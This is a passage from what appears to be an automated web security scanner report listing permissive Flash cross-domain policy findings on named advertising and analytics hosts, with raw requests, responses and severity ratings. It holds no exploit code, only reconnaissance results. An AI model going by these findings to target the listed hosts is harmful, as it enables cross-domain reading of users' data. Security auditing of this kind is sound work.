<allow-access-from domain="*" />
...[SNIP]...

6.17. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 00:57:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 00:57:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.18. http://img-cdn.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img-cdn.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 00:55:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://img.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:49 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.20. http://imp.fetchback.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.21. http://init.lingospot.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://init.lingospot.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: init.lingospot.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=7200
Content-Type: text/xml
Etag: "-5d35a762ba6b2244"
Last-Modified: Mon, 09 May 2011 16:03:41 GMT
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:54:31 GMT
Server: Google Frontend

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.22. http://l.betrad.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://l.betrad.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:59:03 GMT
ETag: "4e4ed5c4=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Fri, 19 Aug 2011 21:29:40 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...

6.23. http://m.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 00:55:53 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.24. http://metrics.sprint.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Omniture DC/2.0.0
xserver: www372
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.25. http://nmsacramento.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nmsacramento.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nmsacramento.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:37 GMT
Server: Omniture DC/2.0.0
xserver: www411
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.26. http://pix04.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:49:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.27. http://pixel.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6804 26628
Set-Cookie: ts=1315097793; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:56:33 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.28. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 01:00:45 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 01:00:45 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.29. http://premium.mookie1.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://premium.mookie1.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: premium.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820b-d0-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.30. http://query.yahooapis.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://query.yahooapis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: query.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 01:10:48 GMT
Server: YTS/1.19.8
Age: 1

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

6.31. http://r.casalemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.casalemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:23:18 GMT
ETag: "1ad8fc9-e6-3595180"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:56:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.32. http://r.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:47:36 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.33. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rcv-srv48.inplay.tubemogul.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: rcv-srv48.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1314384909000"
Last-Modified: Fri, 26 Aug 2011 18:55:09 GMT
host: rcv-srv48
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 00:45:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.34. http://s.meebocdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.meebocdn.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.meebocdn.net

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 03 May 2011 00:23:33 GMT
ETag: "3934951678"
Server: lighttpd/1.4.19
Content-Type: text/xml
Cache-Control: max-age=163863
Expires: Mon, 05 Sep 2011 22:41:27 GMT
Date: Sun, 04 Sep 2011 01:10:24 GMT
Content-Length: 348
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="False"/>
<allow-access-from domain="*.meebo.com" secure="False"/>
<allow-http-request-headers-from domain="*.meebo.com" headers="*"/>
<allow-access-from domain="*.meebocdn.net" secure="False"/>
...[SNIP]...

6.35. http://s0.2mdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 03 Sep 2011 23:21:26 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5440
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.36. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:58:35 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:58:35 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.37. https://socialize.gigya.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://socialize.gigya.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: socialize.gigya.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:0"
Server: Microsoft-IIS/7.5
X-Server: web517
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sun, 04 Sep 2011 01:18:42 GMT
Connection: close
Content-Length: 341

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.38. http://statse.webtrendslive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8a2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:58:31 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.39. http://sync.adap.tv/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sync.adap.tv
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.adap.tv

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: close
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.40. http://sync.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x1 pid 0x24ad 9389
Set-Cookie: ts=1315097753; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:55:53 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.41. http://tags.bluekai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:13:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "1d83ce-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

6.42. http://tcr.tynt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tcr.tynt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Sun, 04 Sep 2011 01:04:39 GMT
ETag: "251523935"
Expires: Sun, 04 Sep 2011 01:34:39 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/54F8)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.43. http://trc.taboolasyndication.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trc.taboolasyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:01:04 GMT
Content-Type: text/xml
Content-Length: 409
Last-Modified: Sun, 10 Jul 2011 17:16:59 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.44. http://turn.nexac.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://turn.nexac.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:57:26 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:57:25 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.45. http://usatoday1.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:37 GMT
Server: Omniture DC/2.0.0
xserver: www166
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.46. http://wa.proflowers.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wa.proflowers.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:03 GMT
Server: Omniture DC/2.0.0
xserver: www625
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.47. http://www.wunderground.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:55 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 26 May 2011 00:03:43 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.48. http://adadvisor.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:48 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

6.49. http://ads.adbrite.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 00:57:22 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

6.50. http://cim.meebo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cim.meebo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cim.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:08:38 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

6.51. http://cm.npc-mcclatchy.overture.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.npc-mcclatchy.overture.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

6.52. http://content.usatoday.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
